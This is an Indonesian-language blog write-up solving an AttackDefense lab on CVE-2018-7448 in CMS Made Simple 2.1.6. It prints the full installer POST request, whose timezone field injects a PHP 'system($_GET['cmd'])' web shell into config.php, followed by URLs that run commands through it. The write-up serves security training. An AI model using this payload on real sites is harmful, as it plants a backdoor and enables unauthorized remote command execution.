Menu

AttackDefense.com [RCE] - CVE-2018-7448 Exploit

AttackDefense.com [RCE] - CVE-2018-7448 Exploit

 


Pendahuluan

Penyerangan ini mungkin tidak memiliki akses tingkat pengguna ke aplikasi web. Namun, ini tidak berarti bahwa aplikasi tidak dapat diserang dari jarak jauh. Kerentanan RCE ini dapat dipicu bahkan oleh pengguna yang tidak di autentikasi.

Dalam latihan di bawah ini, penyerangan tidak di autentikasi ke aplikasi web dan perlu menemukan serangan RCE untuk menjalankan perintah arbitrary ke sisi server.

CMS Made Simple adalah sistem menajemen konten open source gratis untuk mengelola situs web atau portal web yang ditulis dalam pemrograman PHP.

CMS Made Simple ( 2.1.6) Rentan terhadap RCE yang didokumentasi di CVE-2018-7448

Tujuan: Tugas anda adalah menemukan dan memanfaatkan kerentanan ini.

Tingkat Kesulitan untuk RCE : Menengah

Kategori : CVE aplikasi web > RCE

SOLUTION

di lab ini, saya mendapatkan instalasi dasar CMS Made Simple (2.1.6) yang dikenal rentan.


Setelah mencari versi spesifik dari aplikasi CMS di internet, yap saya menemukan tautan di exploit db ini: 

https://www.exploit-db.com/exploits/44192/


Arbitrary PHP code ini bisa di injected ke dalam file konfigurasi (config.php) setelah instalasi selesai. Untuk memasukan code PHP, instalasi baru dan kredensial database yang valid diperlukan. Langkah selanjutnya adalah melanjutkan penginstalan CMS di link berikut:

http://jvria5vb563wevd50mt5op1pb.public2.attackdefenselabs.com/cmsms-2.1.6-install.php/index.php


Pada langkah 4, kita dapat melihat masukan rentan kita, dan kita dapat mengamati bahwa kredensial database diisi secara otomatis, untuk kita gunakan:


Saat menekan Next, permintaan berikut dilakukan:


Untuk mengekploitasi kerentanan yang diketahui, saya memperbarui permintaan untuk memasukan payload backdoor 


Berikut adalah salinan persis dari permintaan langkah instalasi 4:
POST /cmsms-2.1.6-install.php/index.php?mec6d93f0=4 HTTP/1.1
Host: jvria5vb563wevd50mt5op1pb.public2.attackdefenselabs.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://jvria5vb563wevd50mt5op1pb.public2.attackdefenselabs.com/cmsms-2.1.6-install.php/index.php?mec6d93f0=4
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
Connection: close
Cookie: CMSICd5c5cea1d0=70e72cvsubnlpsnoef9tvjdr64; CMSSESSID05d11d962997=q21dk94sh5dr1f4r436lm7vfs2
Upgrade-Insecure-Requests: 1

dbhost=localhost&dbname=app&dbuser=root&dbpass=&timezone=junk';echo%20system($_GET['cmd']);$junk='junk&next=Next+%E2%86%92

Selanjutnya, saya harus menyelesaikan instalasi CMS untuk membuka  backdoor di halaman config.php


Kita dapat mengeksekusi kode menggunakan backdoor publik yang tersedia berikut di config.php menggunakan paramater cmd

http://jvria5vb563wevd50mt5op1pb.public2.attackdefenselabs.com/config.php?cmd=id


http://jvria5vb563wevd50mt5op1pb.public2.attackdefenselabs.com/config.php?cmd=date



Iklan Tengah Post

Ads middle content1

Ads middle content2